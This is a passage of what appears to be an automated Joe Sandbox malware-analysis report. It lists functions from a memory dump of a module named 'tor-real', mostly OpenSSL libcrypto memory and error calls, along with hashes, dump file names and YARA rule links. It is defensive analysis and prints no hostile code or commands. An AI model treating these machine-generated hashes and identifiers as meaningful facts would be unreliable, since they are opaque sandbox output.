                                                                            • Instruction Fuzzy Hash: 8401E5B1108B40CFD310DF25C488B6ABBE0BF88319F51896DE4A85B761C779A4498F46
                                                                            Function 6C09A946 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C09A963
                                                                            • CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C09A985
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_freeO_malloc
                                                                            • String ID: w
                                                                            • API String ID: 2609694610-476252946
                                                                            • Opcode ID: 66d3de9a77b8e84e488c8116259aaa5d0d3e27d259a399fdef3e373822786e22
                                                                            • Instruction ID: ecd78c91b7f13356c39ab3439dccc297a44a5d705e9238ccf9b0556c7a830de6
                                                                            • Opcode Fuzzy Hash: 66d3de9a77b8e84e488c8116259aaa5d0d3e27d259a399fdef3e373822786e22
                                                                            • Instruction Fuzzy Hash: CEF0BDB1409B019FE7409F14D49435ABBE0FF40748F15C92CD89C5F751C77AA499CB81
                                                                            Function 6C0AA006 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C0AA027
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0AA065
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_mallocR_put_error
                                                                            • String ID: A
                                                                            • API String ID: 2513334388-3554254475
                                                                            • Opcode ID: c1e3da3cbacb05f57ab386771c8424aaaae60f9b1c0be6eea7b50adeae59272c
                                                                            • Instruction ID: 9be90a7cd62ffa84e32564fa3179d37c7e05c61a7d9d63e516dcafb6b27bceed
                                                                            • Opcode Fuzzy Hash: c1e3da3cbacb05f57ab386771c8424aaaae60f9b1c0be6eea7b50adeae59272c
                                                                            • Instruction Fuzzy Hash: F2F01CB22483069FD7009F94D40438EBBE0FB80748F00892CE9D85B751D7BA95898B82
                                                                            Function 6C0B2A73 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0B2A9F
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0B2AB9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_freeR_put_error
                                                                            • String ID: A
                                                                            • API String ID: 3735976985-3554254475
                                                                            • Opcode ID: dd185dce889ef5237f1fd411a348ac6ded939241f08c631489e55043bcd2f5cb
                                                                            • Instruction ID: d91aecacd17d5300f30c670ca5932cb2302466b4fd5f7e48979b32c167b9a799
                                                                            • Opcode Fuzzy Hash: dd185dce889ef5237f1fd411a348ac6ded939241f08c631489e55043bcd2f5cb
                                                                            • Instruction Fuzzy Hash: AEE0E5B220D3019FE3109F94E48539EFBE0BB85348F10892DE2D85B650C7B995888B86
                                                                            Function 6C096713 Relevance: 4.6, APIs: 3, Instructions: 107COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C09672F
                                                                              • Part of subcall function 6C095930: CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C09594A
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C096917
                                                                              • Part of subcall function 6C09A800: CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C09A875
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0968D2
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0968EA
                                                                              • Part of subcall function 6C0959B0: CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0959CA
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C096986
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C09699E
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$O_malloc
                                                                            • String ID:
                                                                            • API String ID: 2767441526-0
                                                                            • Opcode ID: ba75865c12dd505295bda479c1d8534c22de76da2a11706f2eb53980b3dd2085
                                                                            • Instruction ID: 9a50a4dca25eadd30f330727cffd098b44e9c4647d6bc1453f69818e1bbe60b7
                                                                            • Opcode Fuzzy Hash: ba75865c12dd505295bda479c1d8534c22de76da2a11706f2eb53980b3dd2085
                                                                            • Instruction Fuzzy Hash: F551E0B0505B09CFE750DF29C180796FBE0BF88308F508A2DD9AA8B752DB71A954CF85
                                                                            Function 6C0AEE66 Relevance: 4.6, APIs: 3, Instructions: 66COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_realloc$R_put_errormemset
                                                                            • String ID:
                                                                            • API String ID: 3557331458-0
                                                                            • Opcode ID: 7c64b4f2aafdc40b744eca7cb6bc43bdfb5ebd4a81d13092a154894006e61daa
                                                                            • Instruction ID: a4776e1d141068625183326dd3ac6d3b97247316999e6712cc9817a9296686d4
                                                                            • Opcode Fuzzy Hash: 7c64b4f2aafdc40b744eca7cb6bc43bdfb5ebd4a81d13092a154894006e61daa
                                                                            • Instruction Fuzzy Hash: 1C31D2B55093429FC740CF55C08479ABBE1BFC8344F559A2EE8A89B351D730E546CF92
                                                                            Function 6C0D4EA7 Relevance: 4.5, APIs: 3, Instructions: 44COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D4C7B
                                                                            • EVP_MD_CTX_free.LIBCRYPTO-1_1 ref: 6C0D4C83
                                                                            • BUF_reverse.LIBCRYPTO-1_1 ref: 6C0D4EC3
                                                                              • Part of subcall function 6C095630: CRYPTO_zalloc.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,6C0DD604), ref: 6C095661
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D4E3B
                                                                            • EVP_MD_CTX_free.LIBCRYPTO-1_1 ref: 6C0D4E43
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_freeX_free$F_reverseO_zalloc
                                                                            • String ID:
                                                                            • API String ID: 463408481-0
                                                                            • Opcode ID: 8d58cc86a176305f9e3363f5837ec77830f00b96dba09bda3766e4ca56db1d3b
                                                                            • Instruction ID: 6cdf415971dc6665ffa0f3c6462114a8d6a13ab092e08dbfb66def2dd6a09c0d
                                                                            • Opcode Fuzzy Hash: 8d58cc86a176305f9e3363f5837ec77830f00b96dba09bda3766e4ca56db1d3b
                                                                            • Instruction Fuzzy Hash: E711BDB16087009FD310DF69D080B6EBBE0AF89318F51CA2DE09DAB650D735E9859B82
                                                                            Function 6C0A4E24 Relevance: 4.5, APIs: 3, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$__stack_chk_failmemcmp
                                                                            • String ID:
                                                                            • API String ID: 2806090773-0
                                                                            • Opcode ID: 17907bd8b5b02a4e81d4586c30a433a0f4f839e9a5378b395f98bcfc8d4d41a4
                                                                            • Instruction ID: 4c47285fe4bb6186cca9d6008f347e479170ba1bcd992f6debbe12f816d1da29
                                                                            • Opcode Fuzzy Hash: 17907bd8b5b02a4e81d4586c30a433a0f4f839e9a5378b395f98bcfc8d4d41a4
                                                                            • Instruction Fuzzy Hash: 92F0B7B1A093019FC700DFD4D48465EFBE0BF89744F418C1DE4989B710C735D4898B46
                                                                            Function 6C0AA419 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0AA433
                                                                            • CRYPTO_mem_ctrl.LIBCRYPTO-1_1 ref: 6C0AA43F
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0AA46B
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_freeO_mem_ctrlR_put_error
                                                                            • String ID:
                                                                            • API String ID: 4239609840-0
                                                                            • Opcode ID: 807831c3065661613ef8870d55180136795d6d29728b3b2a4b7149e9163130e3
                                                                            • Instruction ID: 681f17cf4f72ecbf2d8aa01b9bd63193fcbde5188ea4fa8659501cbd82e97ead
                                                                            • Opcode Fuzzy Hash: 807831c3065661613ef8870d55180136795d6d29728b3b2a4b7149e9163130e3
                                                                            • Instruction Fuzzy Hash: B8E04EB244D7159EE700AF94D44539EBBE0BF84B08F118C1CE5D80B690C7B9A58A8F97
                                                                            Function 6C0DEF89 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6C0CA0C0: ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA0F4
                                                                            • CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 6C0DEEF6
                                                                            • __stack_chk_fail.LIBSSP-0 ref: 6C0DF9F9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_clear_freeR_put_error__stack_chk_fail
                                                                            • String ID: 2
                                                                            • API String ID: 3211164415-450215437
                                                                            • Opcode ID: d392e0d183b1eb7677f26c75a0ddf4afb809723427d2a021eec4edaca1b6326a
                                                                            • Instruction ID: 0acaa80ec7f4423349a163b6691e3285382235432073dde51d6d04a83d1b4ce4
                                                                            • Opcode Fuzzy Hash: d392e0d183b1eb7677f26c75a0ddf4afb809723427d2a021eec4edaca1b6326a
                                                                            • Instruction Fuzzy Hash: 9801DA71108741DFD310DF15C448B6AB7E0BF88318F55C96DD5A85B761C778A4498F46
                                                                            Function 6C0C2469 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6C0CA0C0: ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA0F4
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0C245D
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0C2591
                                                                            • __stack_chk_fail.LIBSSP-0 ref: 6C0C259B
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0C266B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$R_put_errorY_free__stack_chk_fail
                                                                            • String ID: P
                                                                            • API String ID: 28610519-3110715001
                                                                            • Opcode ID: 89e0870010a11e6badd64a4b70026a9b63a7ec66cadd49bd07b0bead65c46b0e
                                                                            • Instruction ID: c3aa923db0fe36ef74f5e2bbd785e220ed15b5d1d79f7c7de86de030c276519b
                                                                            • Opcode Fuzzy Hash: 89e0870010a11e6badd64a4b70026a9b63a7ec66cadd49bd07b0bead65c46b0e
                                                                            • Instruction Fuzzy Hash: 2AF01FB12097029FE310DF64D08876FBBE0BB88358F40881CE4998BA60C7B4A448CB93
                                                                            Function 6C0965A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6C095A50: CRYPTO_free.LIBCRYPTO-1_1(?,?,?,?,?,?,6C0963B8), ref: 6C095A6A
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C096606
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID: 8
                                                                            • API String ID: 2581946324-4194326291
                                                                            • Opcode ID: 45493bdfc2d63ffef3e229fe0683ada74158e3c2fcb933aefdd5be85738d31c0
                                                                            • Instruction ID: 93e15e4b2309abaa13e4fbff6f8a147e683afc6c1b6dcd893f34aa104dd63a08
                                                                            • Opcode Fuzzy Hash: 45493bdfc2d63ffef3e229fe0683ada74158e3c2fcb933aefdd5be85738d31c0
                                                                            • Instruction Fuzzy Hash: 7AF05FB8504740CBCB40AF64C4C4B5DB7E4BF09219F4569A9EC888F716DB34A484AB95
                                                                            Function 6C0CE4D6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6C0CA0C0: ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA0F4
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0CE189
                                                                            • __stack_chk_fail.LIBSSP-0 ref: 6C0CE8C1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_freeR_put_error__stack_chk_fail
                                                                            • String ID: 2
                                                                            • API String ID: 1428589374-450215437
                                                                            • Opcode ID: eaf8c13c56d860a88f7d6ea74d087377013db9e060b18e62b7f7d2f223d7fb57
                                                                            • Instruction ID: 91b3f51f3677b4067a885eca0269b472bbe0c203399bdcbc6ff67cb46240dd87
                                                                            • Opcode Fuzzy Hash: eaf8c13c56d860a88f7d6ea74d087377013db9e060b18e62b7f7d2f223d7fb57
                                                                            • Instruction Fuzzy Hash: BCF0FFB22083018FD3109F98D88175EFBF0FB89758F408C2DE598AB651C3B9A4098B82
                                                                            Function 6C09AB50 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1(?,?,?,?,?,6C097BA6,?,?,?,?,?,?,?,?,?,00000000), ref: 6C09AB89
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
